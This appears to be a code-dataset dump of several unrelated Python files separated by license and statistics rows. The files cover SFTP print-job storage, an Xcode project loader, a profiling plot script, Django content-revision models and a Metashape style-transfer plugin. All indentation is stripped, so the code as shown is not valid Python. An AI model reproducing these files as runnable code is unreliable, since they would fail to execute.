username, self.remote_path, username, file, sha512)
return self._sftp_wrapper(node, command_script)
def _sftp_wrapper(self, node, command_script):
print >> sys.stderr, time.time(), '_sftp_wrapper(%s, %s, %s)' % (self, node, command_script)
p = Popen( [self.sftp, node], stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=False, bufsize=1024, cwd=self.landing)
p.communicate(command_script)
maxtime = time.time() + 36
while ( time.time() < maxtime ):
retstatus = p.poll()
print >> sys.stderr, time.time(), "_sftp_wrapper.retstatus = ", retstatus
if retstatus == 0:
return True
elif retstatus is None:
time.sleep(2)
else:
return False
p.kill()
return False
def registerGridList(self, gridlist):
self.topolist = self._topoCalc(gridlist)
self.gridlist = gridlist
def getHeaders(self, username):
cmd = 'return %s' % (username,)
sock = self._getfile(cmd)
rawheaders = sock.readlines()
sock.close()
return rawheaders
def getIndex(self, username):
index = []
for raw in self.getHeaders(username):
(uuid, sha512, created, pageinfo, ipaddr,
printer, username, title ) = raw.split('\034', 8)
created = datetime.fromtimestamp(int(created))
pageinfo = int(pageinfo)
if (pageinfo % 2 == 0):
duplex = False
else:
duplex = True
sheets = pageinfo >> 1
if printer is not None and printer != '0.0.0.0':
try:
(printer, aliases, ip_list) = gethostbyaddr(printer)
except:
printer = 'UNKNOWN'
else:
printer = 'UNKNOWN'
if ipaddr is not None and ipaddr != '0.0.0.0':
try:
(client, aliases, ip_list) = gethostbyaddr(ipaddr)
except:
client = 'unknown'
else:
client = 'localhost'
index.append((uuid, sha512, created, sheets, duplex, client, printer, username, title))
return index
def indexStr(self, tuple):
(uuid, sha512, created, sheets, duplex, client, printer, username, title) = tuple
expiretime = created + timedelta(0, 14400) # four hours from time created
return '%-32s %-12s %6s %15s' % (title[:32], printer.partition('-')[0], sheets, expiretime.strftime('%a %I:%M:%S %p'))
def retrieveJob(self, username, sha512, gridlist=None):
userrand = random.Random()
userrand.seed(username)
# Can't reference a member of an argument as a default value
if gridlist is None:
gridlist = self.gridlist
if gridlist is not None:
try:
nodes = userrand.sample(gridlist, 3)
nodes = filter(lambda h: h in nodes, self.topolist)
except ValueError:
nodes = gridlist[0:3]
else:
nodes = ('localhost',)
for node in nodes:
print >> sys.stderr, 'retreiveJob trying node: ', node
if self._retrieve(node, username, sha512):
print >> sys.stderr, time.time(), 'job %s/%s successfully retrieved from %s\n' % (username, sha512, node)
localfile = self.landing + os.sep + sha512
if os.path.exists(localfile):
return localfile
else:
print >> sys.stderr, time.time(), "unable to locate ", localfile
else:
print >> sys.stderr, time.time(), 'unable to retreive job %s/%s from node %s\n' % (username, sha512, node)
self.topolist.remove(node)
self.topolist.append(node)
return None
def storeJob(self, job, gridlist=None):
if job.size > self.maxsize:
print >> sys.stderr, time.time(), 'Not attempting to store job:%d size (%d bytes) is larger than allowed\n' % (job.jobId, job.size)
job.removeTmpFile()
return
username = job.username
sha512 = job.sha512
tmpfile = job.tmpfile
userrand = random.Random()
userrand.seed(username)
# Can't reference a member of an argument as a default value
if gridlist is None:
gridlist = self.gridlist
if gridlist is not None:
try:
nodes = userrand.sample(gridlist, 3)
except ValueError:
nodes = gridlist[0:3]
pid = Popen(["/home/dcedev/ninja/sftp_push.sh", username, tmpfile, sha512, nodes[0], nodes[1], nodes[2]]).pid
print >> sys.stderr, time.time(), repr(["/home/dcedev/ninja/sftp_push.sh", username, tmpfile, sha512, nodes[0], nodes[1], nodes[2]]), pid
else:
nodes = ('localhost',)
| mit | -3,009,904,633,007,559,000 | 32.28 | 148 | 0.563822 | false | 3.913452 | false | false | false |
samdmarshall/pyXcode | pyXcode/xcodeproj.py | 1 | 2091 | import os
import sys
# importing the pbProj module
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'pbProj'))
from pbProj import pbProj
# importing the xcscheme module
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'pyxcscheme'))
from pyxcscheme import xcscheme
from Helpers import Logger
class xcodeproj(object):
def __init__(self, xcodeproj_file_path):
if os.path.exists(xcodeproj_file_path):
if xcodeproj_file_path.endswith(('.xcodeproj', '.pbproj')):
self.filePath = xcodeproj_file_path
# loading the pbxproj
pbxproj_file_path = os.path.join(self.filePath, 'project.pbxproj')
if os.path.exists(pbxproj_file_path):
self.projectFile = pbProj.PBXProj(pbxproj_file_path)
else:
Logger.write().error('Could not find the pbxproj file!')
# load schemes
self.schemes = xcscheme.LoadSchemes(self.filePath)
else:
Logger.write().error('Not a Xcode project file!')
else:
Logger.write().error('Could not find the Xcode project file!')
def projects(self):
return self.projectFile.projects()
def hasSchemeWithName(self, scheme_name):
"""
This method is used for both 'xcworkspace' and 'xcodeproj' classes. It returns a two
element tuple that contains the following:
First element:
A 'True' or 'False' value indicating if a scheme with the passed name was found in
this project or workspace file.
Second element:
The scheme object if a scheme with matching name was found, None otherwise.
"""
found_scheme = None
scheme_filter = filter(lambda scheme: scheme.name == scheme_name, self.schemes)
if len(scheme_filter) > 0:
found_scheme = scheme_filter[0]
return (found_scheme != None, found_scheme) | bsd-3-clause | 7,207,501,181,567,734,000 | 36.357143 | 95 | 0.596365 | false | 4.293634 | false | false | false |
nbigaouette/sorting | profiling/plot.py | 1 | 1144 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import glob
import re
import os
import sys
import numpy as np
import matplotlib.pyplot as plt
if len(sys.argv) == 1:
print('Usage: plot.py path/to/build/profiling')
sys.exit(1)
csv_files = glob.glob(os.path.join(sys.argv[1], '*.csv'))
if (len(csv_files) == 0):
print('No csv found in ' + sys.argv[1] + '!')
sys.exit(1)
fig = plt.figure()
ax = fig.add_subplot(111)
colors = iter(plt.cm.rainbow(np.linspace(0,1,len(csv_files))))
p = re.compile(r'profiling_(.*?)_(.*?)\.csv')
ms_to_s = 1.0 / 1000.0
for csv_file in csv_files:
data = np.genfromtxt(csv_file, delimiter=',', skip_header=1).transpose()
j = data[0]
N = data[1]
avg = data[2]
std = data[3]
m = p.search(csv_file)
name = m.group(2)
name = name.replace('_', ' ')
ax.errorbar(N, avg*ms_to_s, yerr=std*ms_to_s,
label=name, color=next(colors), marker='o')
ax.grid(True)
ax.set_xlabel('N')
ax.set_ylabel('Timing [s]')
ax.set_xscale('log', basex=2)
ax.set_yscale('log')
xlims = ax.get_xlim()
ax.set_xlim(xlims[0]/2, xlims[1]*2)
ax.legend(loc='best')
plt.show()
| bsd-3-clause | 763,205,658,088,627,300 | 21 | 76 | 0.603147 | false | 2.503282 | false | false | false |
motherjones/mirrors | mirrors/models.py | 1 | 11917 | import datetime
import re
import sys
from django.dispatch import receiver
from django.contrib.auth.models import User
from django.db import models
from django.db.models import Max
from django.utils.timezone import utc
from django.utils import timezone
from django.core.urlresolvers import reverse
from jsonfield import JSONField
from mirrors.exceptions import LockEnforcementError
class Component(models.Model):
"""A ``Component`` is the basic type of object for all things in the Mirrors
content repository. Anything that has a presence in the final output of the
website is made of at least one ``Component`` object, and will generally be
made from several few.
.. warning :: The implementation of this class is incomplete and may change
in the future.
"""
slug = models.SlugField(max_length=100, unique=True)
content_type = models.CharField(max_length=50, default='none')
schema_name = models.CharField(max_length=50, null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
@property
def data_uri(self):
"""Get the URI for this ``Component``.
:rtype: str
"""
if self.binary_data is not None:
return reverse('component-data', kwargs={'slug': self.slug})
else:
return None
@property
def metadata(self):
"""Get the current metadata from the most recent revision of the
component.
:rtype: dict
"""
return self.metadata_at_version(self.max_version)
@property
def binary_data(self):
"""Get the data from the most recent revision of the data.
:rtype: bytes
"""
try:
return self.binary_data_at_version(self.max_version)
except IndexError:
return None
@property
def max_version(self):
"""Get the version number for the most recent revision.
:rtype: int
.. note :: If there are no revisions, max_version will be 0
"""
version = self.revisions.all().aggregate(Max('version'))
if version['version__max'] is None:
return 0
else:
return version['version__max']
def _version_in_range(self, version):
return (version > 0) and (version <= self.max_version)
def new_revision(self, data=None, metadata=None):
"""Create a new revision for this ``Component`` object. If the data is not in
the correct format it will attempt to convert it into a bytes object.
Passing None for one of the arguments will result in that data not
being changed.
:param data: the actual content of the new revision
:type data: bytes
:param metadata: the new metadata
:type metadata: dict
:rtype: :class:`ComponentRevision`
:raises: :class:`ValueError`
"""
if not data and not metadata:
raise ValueError('no new revision data was actually provided')
next_version = 1
cur_rev = self.revisions.all().order_by('-version').first()
if cur_rev is not None:
next_version = cur_rev.version + 1
new_rev = ComponentRevision.objects.create(
data=data,
metadata=metadata,
component=self,
version=next_version
)
new_rev.save()
return new_rev
def new_attribute(self, name, child, weight=-1):
"""Add a new named attribute to the ``Component`` object. This will overwrite
an attribute if the child is unchanged. However, if the child has a
different slug, then the attribute will be converted into an ordered
list and the child component added to it.
:param name: the attribute's name, which can only contain alphanumeric
characters as well as the - and _ characters.
:type name: str
:param child: the `Component` object to associate with that name
:type child: `Component`
:param weight: the weight of the child within the ordered list, if the
attribute is one
:type weight: int
:rtype: :class:`ComponentAttribute` or a list
"""
if not child or child == self:
raise ValueError('child cannot be None or self')
if not re.match('^\w[-\w]*$', name):
raise KeyError('invalid attribute name')
# attr never gets used again... just comented this out for now
# if self.attributes.filter(name=name).count() == 1:
# attr = self.attributes.get(name=name)
new_attr = ComponentAttribute(
name=name,
parent=self,
child=child,
weight=weight
).save()
return new_attr
def get_attribute(self, attribute_name):
"""Retrieve the `Component` object attached to this one by the
attribute name if it is a regular attribute, or a list if it contains
more than one
:param attribute_name: name of the attribute
:type attribute_name: str
:rtype: `Component` or list
"""
attrs = self.attributes.filter(name=attribute_name)
if attrs.count() == 0:
raise KeyError("no such attribute '{}'".format(attribute_name))
elif attrs.count() == 1:
attr = attrs.first()
if attr.weight == -1:
return attr.child
else:
return [attr.child]
elif attrs.count() > 1:
return [attr.child for attr in attrs.order_by('weight')]
def metadata_at_version(self, version):
"""Get the metadata for the :class:`Component` as it was at the
provided version.
:param version: The version of the `Component` that you want to get
the metadata for.
:type version: int
:rtype: dict
:raises: :class:`IndexError`
"""
if not self._version_in_range(version):
raise IndexError('No such version')
qs = self.revisions.filter(metadata__isnull=False,
version__lte=version).order_by('-version')
rev = qs.first()
if rev is not None:
return rev.metadata
else:
return {}
def binary_data_at_version(self, version):
"""Get the binary data for the :class:`Component` as it was at the
provided version.
:param version: The version of the `Component` that you want to get
the binary data for.
:type version: int
:rtype: bytes
:raises: :class:`IndexError`
"""
if not self._version_in_range(version):
raise IndexError('No such version')
qs = self.revisions.filter(data__isnull=False,
version__lte=version).order_by('-version')
rev = qs.first()
if rev is not None:
return bytes(rev.data)
else:
return None
@property
def lock(self):
now = datetime.datetime.utcnow().replace(tzinfo=utc)
cur_lock = self.locks.exclude(broken=True)
cur_lock = cur_lock.exclude(lock_ends_at__lte=now)
if cur_lock.count() > 0:
return cur_lock.first()
else:
return None
def lock_by(self, user, lock_period=60):
"""Lock the :class:`Component`, preventing other users from altering it
until the lock expires.
:param value: The user that has requested the lock be created.
:type User: :class:`User`
:rtype: :class:`ComponentLock`
"""
if self.lock is not None:
raise LockEnforcementError(locking_user=self.lock.locked_by,
ends_at=self.lock.lock_ends_at)
lock = ComponentLock()
t_delta = datetime.timedelta(minutes=lock_period)
now = datetime.datetime.utcnow().replace(tzinfo=utc)
lock.component = self
lock.locked_by = user
lock.lock_ends_at = now + t_delta
lock.save()
return lock
def unlock(self, unlocking_user):
"""Unlock the :class:`Component`.
:param unlocking_user: The user that has requested the lock be broken.
:type unlocking_user: :class:`User`
"""
# TODO: right now we don't care who breaks a lock, but eventually
# authorization will have to be implemented
# we have to assign self.lock to a new variable because if we don't,
# because otherwise it'll keep executing SQL queries
lock = self.lock
if lock is not None:
lock.broken = True
lock.save()
def __str__(self):
return self.slug
class ComponentAttribute(models.Model):
"""A named connection between a :class:`Component` and one or more other
``Component`` objects that are considered to be attributes of the
first. Some examples of that might include an attribute named "author" that
connects an article ``Component`` to the ``Component`` that contains
information about its author.
.. warning :: The implementation of this class is incomplete and may change
in the future.
"""
parent = models.ForeignKey('Component', related_name='attributes')
child = models.ForeignKey('Component')
name = models.CharField(max_length=255)
weight = models.IntegerField(null=False, default=-1)
added_time = models.DateTimeField(auto_now_add=True)
def __str__(self):
if self.weight != -1:
return "{}[{},{}] -> {}".format(self.parent.slug,
self.name,
self.weight,
self.child.slug)
else:
return "{}[{}] = {}".format(self.parent.slug,
self.name,
self.child.slug)
class ComponentRevision(models.Model):
"""A revision of the data and metadata for a :class:`Component`. It contains
the binary data itself. Every time a ``Component``'s data is updated, a new
``ComponentRevision`` is created.
.. warning :: The implementation of this class is incomplete and may change
in the future.
"""
data = models.BinaryField(null=True, blank=True)
metadata = JSONField(default=None, null=True, blank=True)
version = models.IntegerField(null=False)
created_at = models.DateTimeField(auto_now_add=True)
component = models.ForeignKey('Component', related_name='revisions')
def __str__(self):
return "{} v{}".format(self.component.slug, self.version)
class ComponentLock(models.Model):
""" Determines whether a ``Component`` can be edited.
"""
locked_by = models.ForeignKey(User)
locked_at = models.DateTimeField(auto_now_add=True)
lock_ends_at = models.DateTimeField()
component = models.ForeignKey('Component', related_name='locks')
broken = models.BooleanField(default=False)
def extend_lock(self, *args, **kwargs):
"""Extend the life time of the current lock. The arguments excepted are the
same as what is acceptable for use when creating a
:class:`datetime.timedelta` object.
:raises: :class:`ValueError`
"""
delta = datetime.timedelta(**kwargs)
if delta.total_seconds() < 0:
raise ValueError()
self.lock_ends_at = self.lock_ends_at + delta
self.save()
def __str__(self):
return "{} locked by {} until {}".format(self.component.slug,
self.locked_by.username,
self.lock_ends_at)
| mit | -1,367,688,952,275,133,000 | 32.102778 | 85 | 0.592683 | false | 4.478392 | false | false | false |
agisoft-llc/photoscan-scripts | src/model_style_transfer.py | 1 | 22320 | # This is python script for Metashape Pro. Scripts repository: https://github.com/agisoft-llc/metashape-scripts
#
# Based on https://colab.research.google.com/github/tensorflow/lucid/blob/master/notebooks/differentiable-parameterizations/style_transfer_3d.ipynb
# Modifications:
# 1. Taking into account cameras positions (when possible) instead of meshutil.sample_view(10.0, 12.0)
# 2. Integration with Metashape Pro to make usage easier
#
# Note that you need to:
# 1. Install CUDA 9.0 and cuDNN for CUDA 9.0
# 2. In Python bundled with Metashape install these packages: tensorflow-gpu==1.9.0 lucid==0.2.3 numpy==1.15.0 Pillow==5.2.0 matplotlib==2.2.2 ipython==6.5.0 PyOpenGL==3.1.0 jupyter==1.0.0
#
# Installation and usage instruction: http://www.agisoft.com/index.php?id=54
import Metashape
import pathlib, shutil, math
from PySide2 import QtGui, QtCore, QtWidgets
# Checking compatibility
compatible_major_version = "1.5"
found_major_version = ".".join(Metashape.app.version.split('.')[:2])
if found_major_version != compatible_major_version:
raise Exception("Incompatible Metashape version: {} != {}".format(found_major_version, compatible_major_version))
class ModelStyleTransferDlg(QtWidgets.QDialog):
def __init__(self, parent):
self.texture_size = 2048
self.rendering_width = 2048
self.steps_number = 1000
self.style_path = ""
self.style_name = "style1"
self.working_dir = ""
self.model_name = "model1"
self.use_cameras_position = len(chunk.cameras) > 0
self.content_weight = 200.0
self.style_decay = 0.95
self.googlenet_style_layers = [
'conv2d2',
'mixed3a',
'mixed3b',
'mixed4a',
'mixed4b',
'mixed4c',
]
self.googlenet_content_layer = 'mixed3b'
if len(Metashape.app.document.path) > 0:
self.working_dir = str(pathlib.Path(Metashape.app.document.path).parent / "model_style_transfer")
self.model_name = pathlib.Path(Metashape.app.document.path).stem
# Paths will be inited in self.exportInput()
self.input_model_path = None
self.input_texture_path = None
self.input_cameras_path = None # Can be None if no cameras or self.use_cameras_position is False
self.output_dir = None
self.output_texture_path = None
self.result_model_path = None
# Cameras will be loaded with self.exportCameras() + self.loadCameras() or randomly sampled with meshutil.sample_view(10.0, 12.0)
self.cameras = None
self.max_fovy = 10.0
self.aspect_ratio = 1.0
QtWidgets.QDialog.__init__(self, parent)
self.setWindowTitle("Model style transfer")
self.createGUI()
self.initDefaultParams()
self.exec()
def modelStyleTransfer(self):
self.loadParams()
print("Script started...")
self.exportInput()
try:
self.textureStyle3D()
except:
Metashape.app.messageBox("Something gone wrong!\n"
"Please check the console.")
raise
finally:
self.reject()
print("Script finished!")
return True
def chooseStylePath(self):
style_path = Metashape.app.getOpenFileName(filter="*.jpg;;*.jpeg;;*.JPG;;*.JPEG;;*.png;;*.PNG")
self.edtStylePath.setText(style_path)
self.edtStyleName.setText(pathlib.Path(style_path).stem)
def chooseWorkingDir(self):
working_dir = Metashape.app.getExistingDirectory()
self.edtWorkingDir.setText(working_dir)
def createGUI(self):
layout = QtWidgets.QGridLayout()
row = 0
self.txtStylePath= QtWidgets.QLabel()
self.txtStylePath.setText("Style image:")
self.txtStylePath.setFixedSize(150, 25)
self.edtStylePath= QtWidgets.QLineEdit()
self.edtStylePath.setPlaceholderText("URL or file path")
self.btnStylePath = QtWidgets.QPushButton("...")
self.btnStylePath.setFixedSize(25, 25)
QtCore.QObject.connect(self.btnStylePath, QtCore.SIGNAL("clicked()"), lambda: self.chooseStylePath())
layout.addWidget(self.txtStylePath, row, 0)
layout.addWidget(self.edtStylePath, row, 1)
layout.addWidget(self.btnStylePath, row, 2)
row += 1
self.txtStyleName = QtWidgets.QLabel()
self.txtStyleName.setText("Style name:")
self.txtStyleName.setFixedSize(150, 25)
self.edtStyleName = QtWidgets.QLineEdit()
layout.addWidget(self.txtStyleName, row, 0)
layout.addWidget(self.edtStyleName, row, 1, 1, 2)
row += 1
self.txtStepsNumber = QtWidgets.QLabel()
self.txtStepsNumber.setText("Steps number:")
self.txtStepsNumber.setFixedSize(150, 25)
self.edtStepsNumber = QtWidgets.QLineEdit()
self.edtStepsNumber.setPlaceholderText("number of iterations")
layout.addWidget(self.txtStepsNumber, row, 0)
layout.addWidget(self.edtStepsNumber, row, 1, 1, 2)
row += 1
self.txtTextureSize = QtWidgets.QLabel()
self.txtTextureSize.setText("Texture size:")
self.txtTextureSize.setFixedSize(150, 25)
self.edtTextureSize = QtWidgets.QLineEdit()
self.edtTextureSize.setPlaceholderText("resulting texture resolution")
layout.addWidget(self.txtTextureSize, row, 0)
layout.addWidget(self.edtTextureSize, row, 1, 1, 2)
row += 1
self.txtRenderingSize = QtWidgets.QLabel()
self.txtRenderingSize.setText("Rendering size:")
self.txtRenderingSize.setFixedSize(150, 25)
self.edtRenderingSize = QtWidgets.QLineEdit()
self.edtRenderingSize.setPlaceholderText("width of rendering buffer")
layout.addWidget(self.txtRenderingSize, row, 0)
layout.addWidget(self.edtRenderingSize, row, 1, 1, 2)
row += 1
self.txtModelName = QtWidgets.QLabel()
self.txtModelName.setText("Model name:")
self.txtModelName.setFixedSize(150, 25)
self.edtModelName = QtWidgets.QLineEdit()
layout.addWidget(self.txtModelName, row, 0)
layout.addWidget(self.edtModelName, row, 1, 1, 2)
row += 1
self.txtWorkingDir= QtWidgets.QLabel()
self.txtWorkingDir.setText("Working dir:")
self.txtWorkingDir.setFixedSize(150, 25)
self.edtWorkingDir= QtWidgets.QLineEdit()
self.edtWorkingDir.setPlaceholderText("path to dir")
self.btnWorkingDir = QtWidgets.QPushButton("...")
self.btnWorkingDir.setFixedSize(25, 25)
QtCore.QObject.connect(self.btnWorkingDir, QtCore.SIGNAL("clicked()"), lambda: self.chooseWorkingDir())
layout.addWidget(self.txtWorkingDir, row, 0)
layout.addWidget(self.edtWorkingDir, row, 1)
layout.addWidget(self.btnWorkingDir, row, 2)
row += 1
self.txtContentWeight= QtWidgets.QLabel()
self.txtContentWeight.setText("Content weight:")
self.txtContentWeight.setFixedSize(150, 25)
self.edtContentWeight= QtWidgets.QLineEdit()
layout.addWidget(self.txtContentWeight, row, 0)
layout.addWidget(self.edtContentWeight, row, 1, 1, 2)
row += 1
self.txtUseCameraPositions= QtWidgets.QLabel()
self.txtUseCameraPositions.setText("Use cameras position:")
self.txtUseCameraPositions.setFixedSize(150, 25)
self.chbUseCameraPositions= QtWidgets.QCheckBox()
if len(chunk.cameras) == 0:
self.chbUseCameraPositions.setEnabled(False)
layout.addWidget(self.txtUseCameraPositions, row, 0)
layout.addWidget(self.chbUseCameraPositions, row, 1)
row += 1
self.txtPBar = QtWidgets.QLabel()
self.txtPBar.setText("Progress:")
self.txtPBar.setFixedSize(150, 25)
self.pBar = QtWidgets.QProgressBar()
self.pBar.setTextVisible(False)
self.pBar.setMinimumSize(239, 25)
layout.addWidget(self.txtPBar, row, 0)
layout.addWidget(self.pBar, row, 1, 1, 2)
row += 1
self.btnRun = QtWidgets.QPushButton("Run")
layout.addWidget(self.btnRun, row, 1, 1, 2)
row += 1
self.setLayout(layout)
QtCore.QObject.connect(self.btnRun, QtCore.SIGNAL("clicked()"), lambda: self.modelStyleTransfer())
def initDefaultParams(self):
self.edtTextureSize.setText(str(self.texture_size))
self.edtRenderingSize.setText(str(self.rendering_width))
self.edtStepsNumber.setText(str(self.steps_number))
self.edtStylePath.setText(str(self.style_path))
self.edtStyleName.setText(self.style_name)
self.edtWorkingDir.setText(self.working_dir)
self.edtModelName.setText(self.model_name)
self.edtContentWeight.setText(str(self.content_weight))
self.chbUseCameraPositions.setChecked(self.use_cameras_position)
def loadParams(self):
self.texture_size = int(self.edtTextureSize.text())
self.rendering_width = int(self.edtRenderingSize.text())
self.steps_number = int(self.edtStepsNumber.text())
self.style_path = self.edtStylePath.text()
self.style_name = self.edtStyleName.text()
self.working_dir = self.edtWorkingDir.text()
self.model_name = self.edtModelName.text()
self.content_weight = float(self.edtContentWeight.text())
self.use_cameras_position = self.chbUseCameraPositions.isChecked()
if len(self.style_path) == 0:
Metashape.app.messageBox("You should specify style image!")
raise Exception("You should specify style image!")
if len(self.working_dir) == 0:
Metashape.app.messageBox("You should specify working dir!")
raise Exception("You should specify working dir!")
def exportInput(self):
working_dir = pathlib.Path(self.working_dir)
print("Creating working directory '{}'...".format(self.working_dir))
working_dir.mkdir(parents=True, exist_ok=True)
self.input_model_path = str(working_dir / "{}.ply".format(self.model_name))
print("Exporting model to '{}'...".format(self.input_model_path))
chunk.exportModel(self.input_model_path, binary=True, texture_format=Metashape.ImageFormatJPEG, texture=True,
normals=False, colors=False, cameras=False, markers=False, format=Metashape.ModelFormatPLY)
self.input_model_path = str(working_dir / "{}.obj".format(self.model_name))
print("Exporting model to '{}'...".format(self.input_model_path))
chunk.exportModel(self.input_model_path, binary=False, texture_format=Metashape.ImageFormatJPEG, texture=True,
normals=False, colors=False, cameras=False, markers=False, format=Metashape.ModelFormatOBJ)
self.input_texture_path = str(working_dir / "{}.jpg".format(self.model_name))
self.input_cameras_path = str(working_dir / "{}.cameras".format(self.model_name))
if not self.use_cameras_position or not self.exportCameras():
self.input_cameras_path = None
self.output_dir = working_dir / self.style_name
print("Creating output directory '{}'...".format(str(self.output_dir)))
if self.output_dir.exists():
print(" output directory already exists! Deleting...")
shutil.rmtree(str(self.output_dir))
self.output_dir.mkdir(parents=False, exist_ok=False)
for ext in ["obj", "ply", "mtl"]:
input_path = working_dir / "{}.{}".format(self.model_name, ext)
output_path = self.output_dir / "{}.{}".format(self.model_name, ext)
print(" copying {}.{} to output...".format(self.model_name, ext))
shutil.copyfile(str(input_path), str(output_path))
self.output_texture_path = str(self.output_dir / "{}.jpg".format(self.model_name))
self.result_model_path = str(self.output_dir / "{}.obj".format(self.model_name))
def exportCameras(self):
matrices = []
selection_active = len([c for c in chunk.cameras if c.selected]) > 0
for c in chunk.cameras:
if (selection_active and not c.selected) or not c.enabled or c.transform is None or c.type != Metashape.Camera.Type.Regular:
continue
calibration = c.sensor.calibration
f, w, h = calibration.f, calibration.width, calibration.height
transformToWorld = chunk.transform.matrix * c.transform
matrices.append({
"transformToWorld": eval(str(transformToWorld)[len("Matrix("):-1]),
"fovH": 2 * math.atan(w / 2 / f) * 180 / math.pi,
"fovV": 2 * math.atan(h / 2 / f) * 180 / math.pi,
"w": w,
"h": h,
})
if len(matrices) == 0:
return False
with open(self.input_cameras_path, "w") as f:
f.writelines(str(matrices))
return True
def loadCameras(self):
import numpy as np
if self.input_cameras_path is None:
return None
with open(self.input_cameras_path) as f:
self.cameras = f.readline()
self.cameras = eval(self.cameras)
if len(self.cameras) == 0:
print("Cameras will be randomly sampled!")
self.cameras = None
self.max_fovy = 10.0
self.aspect_ratio = 1.0
else:
print("Loaded {} cameras!".format(len(self.cameras)))
self.max_fovy = 0.0
self.aspect_ratio = 0.0
for i in range(len(self.cameras)):
m = np.float32(self.cameras[i]["transformToWorld"])
m = np.linalg.inv(m)
m[1, :] = -m[1, :]
m[2, :] = -m[2, :]
self.cameras[i]["transformToCamera"] = m
self.cameras[i]["transformToWorld"] = np.linalg.inv(m)
self.max_fovy = max(self.cameras[i]["fovV"], self.max_fovy)
self.aspect_ratio = self.cameras[i]["w"] / self.cameras[i]["h"]
print("Vertical field of view: {:.2f} degrees. Aspect ratio width/height: {:.2f}.".format(self.max_fovy,
self.aspect_ratio))
def textureStyle3D(self):
print("Importing tensorflow...")
import tensorflow as tf
print("Checking that GPU is visible for tensorflow...")
if not tf.test.is_gpu_available():
raise Exception("No GPU available for tensorflow!")
print("Importing other libraries...")
import os
import io
import sys
from string import Template
from pathlib import Path
import numpy as np
import PIL.Image
# import matplotlib.pylab as pl
from IPython.display import clear_output, display, Image, HTML
# if os.name != 'nt':
# from lucid.misc.gl.glcontext import create_opengl_context
import OpenGL.GL as gl
from lucid.misc.gl import meshutil
from lucid.misc.gl import glrenderer
import lucid.misc.io.showing as show
import lucid.misc.io as lucid_io
from lucid.misc.tfutil import create_session
from lucid.modelzoo import vision_models
from lucid.optvis import objectives
from lucid.optvis import param
from lucid.optvis.style import StyleLoss, mean_l1_loss
from lucid.optvis.param.spatial import sample_bilinear
# if os.name != 'nt':
# print("Creating OpenGL context...")
# create_opengl_context()
gl.glGetString(gl.GL_VERSION)
print("Loading vision model...")
model = vision_models.InceptionV1()
model.load_graphdef()
def prepare_image(fn, size=None):
data = lucid_io.reading.read(fn)
im = PIL.Image.open(io.BytesIO(data)).convert('RGB')
if size:
im = im.resize(size, PIL.Image.ANTIALIAS)
return np.float32(im) / 255.0
self.loadCameras()
print("Loading input model from '{}'...".format(self.input_model_path))
mesh = meshutil.load_obj(self.input_model_path)
if self.cameras is None:
mesh = meshutil.normalize_mesh(mesh)
print("Loading input texture from '{}'...".format(self.input_texture_path))
original_texture = prepare_image(self.input_texture_path, (self.texture_size, self.texture_size))
print("Loading style from '{}'...".format(self.style_path))
style = prepare_image(self.style_path)
rendering_width = self.rendering_width
rendering_height = int(rendering_width // self.aspect_ratio)
print("Creating renderer with resolution {}x{}...".format(rendering_width, rendering_height))
renderer = glrenderer.MeshRenderer((rendering_width, rendering_height))
if self.cameras is not None:
print(" renderer fovy: {:.2f} degrees".format(self.max_fovy))
renderer.fovy = self.max_fovy
sess = create_session(timeout_sec=0)
# t_fragments is used to feed rasterized UV coordinates for the current view.
# Channels: [U, V, _, Alpha]. Alpha is 1 for pixels covered by the object, and
# 0 for background.
t_fragments = tf.placeholder(tf.float32, [None, None, 4])
t_uv = t_fragments[..., :2]
t_alpha = t_fragments[..., 3:]
# Texture atlas to optimize
t_texture = param.image(self.texture_size, fft=True, decorrelate=True)[0]
# Variable to store the original mesh texture used to render content views
content_var = tf.Variable(tf.zeros([self.texture_size, self.texture_size, 3]), trainable=False)
# Sample current and original textures with provided pixel data
t_joined_texture = tf.concat([t_texture, content_var], -1)
t_joined_frame = sample_bilinear(t_joined_texture, t_uv) * t_alpha
t_frame_current, t_frame_content = t_joined_frame[..., :3], t_joined_frame[..., 3:]
t_joined_frame = tf.stack([t_frame_current, t_frame_content], 0)
# Feeding the rendered frames to the Neural Network
t_input = tf.placeholder_with_default(t_joined_frame, [None, None, None, 3])
model.import_graph(t_input)
# style loss
style_layers = [sess.graph.get_tensor_by_name('import/%s:0' % s)[0] for s in self.googlenet_style_layers]
# L1-loss seems to be more stable for GoogleNet
# Note that we use style_decay>0 to average style-describing Gram matrices
# over the recent viewports. Please refer to StyleLoss for the details.
sl = StyleLoss(style_layers, self.style_decay, loss_func=mean_l1_loss)
# content loss
content_layer = sess.graph.get_tensor_by_name('import/%s:0' % self.googlenet_content_layer)
content_loss = mean_l1_loss(content_layer[0], content_layer[1]) * self.content_weight
# setup optimization
total_loss = content_loss + sl.style_loss
t_lr = tf.constant(0.05)
trainer = tf.train.AdamOptimizer(t_lr)
train_op = trainer.minimize(total_loss)
init_op = tf.global_variables_initializer()
loss_log = []
def reset(style_img, content_texture):
del loss_log[:]
init_op.run()
sl.set_style({t_input: style_img[None, ...]})
content_var.load(content_texture)
def sample_random_view():
if self.cameras is None:
return meshutil.sample_view(10.0, 12.0)
else:
rand_m = self.cameras[np.random.randint(0, len(self.cameras))]["transformToCamera"].copy()
return rand_m
def run(mesh, step_n=400):
app = QtWidgets.QApplication.instance()
for i in range(step_n):
fragments = renderer.render_mesh(
modelview=sample_random_view(),
position=mesh['position'], uv=mesh['uv'],
face=mesh['face'])
_, loss = sess.run([train_op, [content_loss, sl.style_loss]], {t_fragments: fragments})
loss_log.append(loss)
if i == 0 or (i + 1) % 50 == 0:
# clear_output()
last_frame, last_content = sess.run([t_frame_current, t_frame_content], {t_fragments: fragments})
# show.images([last_frame, last_content], ['current frame', 'content'])
if i == 0 or (i + 1) % 10 == 0:
print(len(loss_log), loss)
pass
# Show progress
self.pBar.setValue((i + step_n//10 + 1) / (step_n + step_n//10) * 100)
app.processEvents()
reset(style, original_texture)
print("Running {} iterations...".format(self.steps_number))
run(mesh, step_n=self.steps_number)
print("Finished!")
texture = t_texture.eval()
print("Exporting result texture to '{}'...".format(self.output_texture_path))
lucid_io.save(texture, self.output_texture_path, quality=90)
sess.close()
print("Importing result model to Metashape '{}'...".format(self.result_model_path))
chunk.model = None
chunk.importModel(self.result_model_path)
